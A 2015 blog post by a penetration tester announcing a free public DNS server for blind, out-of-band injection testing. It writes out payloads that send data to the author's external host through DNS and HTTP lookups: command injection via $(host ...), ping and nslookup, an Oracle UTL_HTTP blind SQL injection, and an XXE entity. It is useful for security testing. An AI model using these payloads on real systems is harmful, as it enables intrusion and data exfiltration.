Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

In case of blind injection testing, and in addition to previous post, i'm launching a pilot version of my DNS Server (Free for now).

Open up your terminal and connect to sudo.co.il on port 5353:

~# nc sudo.co.il 5353

..snip..
Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query: nicolas-59.sudo.co.il
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "74.125.44.140#47744:", "time": "17:27:44.409"}

In my last WebApplication Penetration Test, i was able to read source code of PHP application, and there was a place with exec() function.
The problem that I didn't get any output, and regular techniques of "sleep 60" does not seems to be working.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host pwned.sudo.co.il)

Get WGET Version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

With this output:
{"date": "xx-xxx-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "xx.xx.xx.xx#63325:", "time": "xx:xx:xx.xxx"}

It may be useful with Command Injection, for example:
$(host $RANDOM-test.sudo.co.il)
| ping $RANDOM-test.sudo.co.il |
&& nslookup nslookup-test.sudo.co.il &&

Blind SQL Injection like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://sqli-test.sudo.co.il/') --

External ENTITY Injection:
<!ENTITY dtd SYSTEM "http://xxe-test.sudo.co.il/file.dtd">%dtd

and more.

For now, it's FREE but with limited support. (you may some $$$ if you love using it :)